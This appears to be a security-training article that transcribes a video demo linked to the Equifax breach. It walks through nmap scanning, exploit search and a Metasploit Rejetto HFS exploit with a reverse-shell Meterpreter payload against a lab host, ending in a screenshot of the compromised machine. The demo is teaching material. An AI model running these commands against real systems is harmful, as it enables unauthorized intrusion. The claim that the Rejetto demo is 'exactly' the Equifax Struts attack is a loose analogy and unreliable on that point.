Inside Equifax’s massive breach: Demo of the exploit
The Equifax data breach affected nearly half of the U.S. population. In this episode of Cyber Work Applied with Infosec Principal Security Researcher Keatron Evans, see how the attack was carried out.
How did Equifax’s breach happen?
The Equifax data breach was one of the most devastating hacks in the past few years. In this episode of Cyber Work Applied, Keatron Evans explains how the breach happened.
Inside Equifax's massive breach | Free Cyber Work Applied series
Cyber Work listeners get free cybersecurity training resources. Click below to get your free courses and other materials.
Equifax breach walkthrough and demo
The edited transcript of Keatron’s Equifax breach walkthrough is provided below, along with a portion of the code he uses.
What was the Equifax vulnerability?
(0:19- 1:05) Equifax, the largest credit reporting agency and one of the largest human intel databases in the world, was breached when a hacker discovered that there was an unpatched version of Apache Struts software running on a server in their DMZ, facing the internet.
What makes this significant is that during the congressional hearing that followed this breach, it was revealed that penetration testers had actually found this vulnerability months before.
As for their official report, the breach happened in mid-May of 2017. There was actually a patch available for this vulnerability in March. That means two months passed after they knew they were vulnerable and did nothing to fix it.
What you will see in this demonstration is that this hack is not very difficult to pull off. As a matter of fact, we might even say it’s novice or beginner-level hacking. Let’s get started.
Scanning target using Nmap
(1:06- 2:21) What you see on my desktop is my typical attacker machine. I’m going to go ahead and scan my target here.
root@kaliMac:~# nmap 192.168.248.246
Now, this is just a straight Nmap scan. This is what we would use if you were scanning a publicly available or a public-facing server. That scan simply shows me what ports are open or which ports are accepting connections on that server or on that IP.
What we would do next is dig a little deeper and find out what the actual service version is that’s running on each one of these individual ports. We’re going to focus on port 8081. Okay. So, I repeat that scan, but I narrow it down to just that port and give it a flag sV.
root@kaliMac:~# nmap 192.168.248.246 -p 8081 -sV
This is basically my way of telling the Nmap tool to do a version probe, which means it’s going to dig into that service, get feedback from that service and figure out what version that service is — based on what the service responds with.
So we go ahead and run that. And as you can see here, Nmap comes back and tells us that like, hey, it’s running this particular version of that service.
HttpFileServer httpd 2.3b
How to find vulnerabilities to exploit
(2:22- 3:27) Now, we’re going to simply go out to the internet, just regular old Google here, and search for vulnerabilities related to that service. We can clearly see that there are several exploits out there for that specific version of that service. And it’s all related to the server name Rejetto, which gives us more information.
So now I’m going to go right back into my exploit tool here, which is Kali, and I’m going to search for exploits related to Rejetto:
root@kaliMac:~# searchsploit rejetto
We can see that there are several that have come back.
Now, furthermore, in the actual Metasploit database, I can actually just search for that as well, andnd it’ll come back with results to show me that this particular exploit framework has exploits for that service.
msf > search rejetto
Once that comes back, all that’s left for me to do is simply load that exploit and then see if it works against that service. And let’s go ahead and do that.
msf > use exploit/windows/http/rejetto_hfs_exec
Using an exploit via Kali Linux
(3:28- 4:18) Now, I just set up the other requirements to run the exploit, such as a payload. This is basically what I want the exploit to do for me. Put in my target and then the port that service is running on that we discovered there.
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
Payload => windows/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set lhost 192.168.248.251
lhost => 192.168.248.251
msf exploit(windows/http/rejetto_hfs_exec) > set rhost 192.168.248.246
rhost => 192.168.248.246
msf exploit(windows/http/rejetto_hfs_exec) > set rport 8081
rport => 8081
So, with all these things in place, all that’s left for me to do is simply launch the exploit to see if the service is indeed vulnerable. So, I go ahead and run it.
msf exploit(windows/http/rejetto_hfs_exec) > exploit
Gaining Access to the System
(4:19- 4:57) And as you can see, what happens there is I get back a session — and that session notification there really means that I’ve totally compromised a system and I have control of it. To prove that, I will simply take a screenshot.
Meterpreter > screenshot
And if we now go and view that image that was just saved locally to our machine, what you’ll see is that it actually is indeed a screenshot of what’s on that victim’s machine that we just compromised:
root@kaliMac:~# firefox /root/r2YFTVhv.jpeg
So this exploit, as you saw, didn’t take me long. It wasn’t very complex.
How Equifax was compromised
(4:58- 5:26) This is exactly what happened with Equifax. They had a vulnerable piece of software like this running and facing the internet. It got discovered in a regular penetration test, and they chose not to fix it.
As you can imagine, what ended up happening is, of course, a bad hacker came along, found the same vulnerability and exploited it just like I exploited this vulnerability. And they had control of that Equifax server, moved horizontally inside Equifax, and then it’s history as we know it from that point.
More cybersecurity training resources
Check out the weekly Cyber Work Podcast for in-depth conversations with cybersecurity practitioners and industry thought leaders — plus other free cybersecurity videos.
Cyber Work listeners also get more free cybersecurity resources. See the latest free training courses and resources and keep learning!